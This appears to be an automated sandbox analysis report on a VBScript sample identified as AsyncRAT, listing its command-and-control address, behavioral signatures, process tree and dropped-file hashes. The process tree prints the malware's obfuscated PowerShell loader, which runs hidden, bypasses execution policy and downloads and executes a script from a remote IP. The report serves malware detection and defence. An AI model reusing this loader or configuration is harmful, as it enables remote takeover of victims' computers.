Analysis
-
max time kernel
95s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28/01/2025, 12:24
Static task
static1
Behavioral task
behavioral1
Sample
6b77f5653e677200c58e8b184676d5b32ab551cfcea76a87e227c1dbdeebfc19.vbs
Resource
win7-20241023-en
General
-
Target
6b77f5653e677200c58e8b184676d5b32ab551cfcea76a87e227c1dbdeebfc19.vbs
-
Size
6KB
-
MD5
f7f8fe92731aff901ca5f2383ac1a13d
-
SHA1
961e1819e8c63e8fcfd9100e985ff30d7e112e9d
-
SHA256
6b77f5653e677200c58e8b184676d5b32ab551cfcea76a87e227c1dbdeebfc19
-
SHA512
2b1baca6c86fde32dcb81b60f717b3567160ca9417119b66ff7904e0f49cb60ca16c5820f550ee7e3f07440e41b40cd8adbcf65d5ba71e6249079129ed60225f
-
SSDEEP
96:egvbRvbRvbRvbRvbRvbRvbRvbRvbRvbRvbRvbRvbRvbRvbRvbRvbRvbRvbRvbRvt:xLPjGZOmyX1
Malware Config
Extracted
asyncrat
AWS | 3Losh
00000001
81.10.39.58:7077
AsyncMutex_alosh
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Blocklisted process makes network request 3 IoCs
flow pid Process 14 2232 powershell.exe 26 2232 powershell.exe 28 2232 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 1380 powershell.exe 2232 powershell.exe 5068 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 25 api.ipify.org 26 api.ipify.org -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 5068 set thread context of 1264 5068 powershell.exe 95 PID 1380 set thread context of 3152 1380 powershell.exe 108 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 2232 powershell.exe 2232 powershell.exe 5068 powershell.exe 5068 powershell.exe 1264 aspnet_compiler.exe 1380 powershell.exe 1380 powershell.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
description pid Process Token: SeDebugPrivilege 2232 powershell.exe Token: SeIncreaseQuotaPrivilege 2232 powershell.exe Token: SeSecurityPrivilege 2232 powershell.exe Token: SeTakeOwnershipPrivilege 2232 powershell.exe Token: SeLoadDriverPrivilege 2232 powershell.exe Token: SeSystemProfilePrivilege 2232 powershell.exe Token: SeSystemtimePrivilege 2232 powershell.exe Token: SeProfSingleProcessPrivilege 2232 powershell.exe Token: SeIncBasePriorityPrivilege 2232 powershell.exe Token: SeCreatePagefilePrivilege 2232 powershell.exe Token: SeBackupPrivilege 2232 powershell.exe Token: SeRestorePrivilege 2232 powershell.exe Token: SeShutdownPrivilege 2232 powershell.exe Token: SeDebugPrivilege 2232 powershell.exe Token: SeSystemEnvironmentPrivilege 2232 powershell.exe Token: SeRemoteShutdownPrivilege 2232 powershell.exe Token: SeUndockPrivilege 2232 powershell.exe Token: SeManageVolumePrivilege 2232 powershell.exe Token: 33 2232 powershell.exe Token: 34 2232 powershell.exe Token: 35 2232 powershell.exe Token: 36 2232 powershell.exe Token: SeIncreaseQuotaPrivilege 2232 powershell.exe Token: SeSecurityPrivilege 2232 powershell.exe Token: SeTakeOwnershipPrivilege 2232 powershell.exe Token: SeLoadDriverPrivilege 2232 powershell.exe Token: SeSystemProfilePrivilege 2232 powershell.exe Token: SeSystemtimePrivilege 2232 powershell.exe Token: SeProfSingleProcessPrivilege 2232 powershell.exe Token: SeIncBasePriorityPrivilege 2232 powershell.exe Token: SeCreatePagefilePrivilege 2232 powershell.exe Token: SeBackupPrivilege 2232 powershell.exe Token: SeRestorePrivilege 2232 powershell.exe Token: SeShutdownPrivilege 2232 powershell.exe Token: SeDebugPrivilege 2232 powershell.exe Token: SeSystemEnvironmentPrivilege 2232 powershell.exe Token: SeRemoteShutdownPrivilege 2232 powershell.exe Token: SeUndockPrivilege 2232 powershell.exe Token: SeManageVolumePrivilege 2232 powershell.exe Token: 33 2232 powershell.exe Token: 34 2232 powershell.exe Token: 35 2232 powershell.exe Token: 36 2232 powershell.exe Token: SeDebugPrivilege 5068 powershell.exe Token: SeDebugPrivilege 1264 aspnet_compiler.exe Token: SeDebugPrivilege 1380 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1264 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 3152 wrote to memory of 2232 3152 WScript.exe 82 PID 3152 wrote to memory of 2232 3152 WScript.exe 82 PID 3328 wrote to memory of 2304 3328 WScript.exe 89 PID 3328 wrote to memory of 2304 3328 WScript.exe 89 PID 2304 wrote to memory of 4356 2304 net.exe 91 PID 2304 wrote to memory of 4356 2304 net.exe 91 PID 3328 wrote to memory of 3100 3328 WScript.exe 92 PID 3328 wrote to memory of 3100 3328 WScript.exe 92 PID 3100 wrote to memory of 5068 3100 cmd.exe 94 PID 3100 wrote to memory of 5068 3100 cmd.exe 94 PID 5068 wrote to memory of 1264 5068 powershell.exe 95 PID 5068 wrote to memory of 1264 5068 powershell.exe 95 PID 5068 wrote to memory of 1264 5068 powershell.exe 95 PID 5068 wrote to memory of 1264 5068 powershell.exe 95 PID 5068 wrote to memory of 1264 5068 powershell.exe 95 PID 5068 wrote to memory of 1264 5068 powershell.exe 95 PID 5068 wrote to memory of 1264 5068 powershell.exe 95 PID 5068 wrote to memory of 1264 5068 powershell.exe 95 PID 1768 wrote to memory of 4556 1768 WScript.exe 102 PID 1768 wrote to memory of 4556 1768 WScript.exe 102 PID 4556 wrote to memory of 2736 4556 net.exe 104 PID 4556 wrote to memory of 2736 4556 net.exe 104 PID 1768 wrote to memory of 4564 1768 WScript.exe 105 PID 1768 wrote to memory of 4564 1768 WScript.exe 105 PID 4564 wrote to memory of 1380 4564 cmd.exe 107 PID 4564 wrote to memory of 1380 4564 cmd.exe 107 PID 1380 wrote to memory of 3152 1380 powershell.exe 108 PID 1380 wrote to memory of 3152 1380 powershell.exe 108 PID 1380 wrote to memory of 3152 1380 powershell.exe 108 PID 1380 wrote to memory of 3152 1380 powershell.exe 108 PID 1380 wrote to memory of 3152 1380 powershell.exe 108 PID 1380 wrote to memory of 3152 1380 powershell.exe 108 PID 1380 wrote to memory of 3152 1380 powershell.exe 108 PID 1380 wrote to memory of 3152 1380 powershell.exe 108
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6b77f5653e677200c58e8b184676d5b32ab551cfcea76a87e227c1dbdeebfc19.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$UYLmDsQZIkAc='IeX(NeW-OBJeCT NeT.W';$znhPDUdSLEIZ='eBCLIeNT).DOWNLO';$CMJiImrPvzVh='repoooos(''http://81.10.39.58:8080/test//Update.php'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($UYLmDsQZIkAc+$znhPDUdSLEIZ+$CMJiImrPvzVh);2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\Music\VGXvCOkpcl.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3328 -
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" session2⤵
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:4356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\VGXvCOkpcl.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Music\VGXvCOkpcl.ps1'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5068 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1264
-
-
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\Music\VGXvCOkpcl.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" session2⤵
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:2736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\VGXvCOkpcl.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4564 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Music\VGXvCOkpcl.ps1'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
- System Location Discovery: System Language Discovery
PID:3152
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
1KB
MD57bec8bed8719d4f10a4ad5da735f76a5
SHA15063793785c97ca8c2cc1344c17380134817e6fc
SHA256d526d49ae7a2d23890f3d1ff15bae25a609f6c19d2614a622565fb1469f8c736
SHA51222ce11472231f11ea0d50a690ddce357bd1c6b7b894873c7c9c8966d15191653583acd9b45d78d47e56b5a444b3329c1eeb1fc1805efe12ada16b08324cd0b2f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2KB
MD5df5c8a9e9da427a809f34b37163b95c0
SHA14ef52ed74237f288132d0d6152768b207339bd03
SHA2566458089c6828bcd5c4b495e5c4d6d5952a4c2332abb0c2c4e8e5e8b6da3d68ca
SHA512164d426c766b518b875f4ec9670c474bda391cc6c8f5f2233ff9e94decdcd30b6814e99c4e20cb93c937da1e234a50e135cdfa979b17689fcf77696124546938
-
Filesize
453KB
MD50d309ee5d6488e2e7f77e970e7d6a191
SHA1991462ffc727617a1aab438505429cadd25b66df
SHA25685184d87854df5b1f6f6dd557591b6c3dce4b193000791315dba01938fb7c02c
SHA5125a617ac01f001409e176a9b02b1247f0f7f4789841ff6e2abfe97355cc05ef74789f37213df9bffdf119290cdefb0aee19aa20a7bd16a996b73773ce925e88e4
-
Filesize
4KB
MD5ff4bcfc9b3d14734746b632c38bb5bcc
SHA10eee9c48feb48233dc0fa357db4df5be69d359bd
SHA25639a3371f33785655de9fdde713c9c1763ff795f7b730c5996848965d02eaccb6
SHA5129cfc9d0b8be7073f60795b89af28d45892cb5416f2c7353f182a6e73997cf661031b20321996cc691deae84bacdf3edaf3c051f4b7283f57de04d72cdfe3d321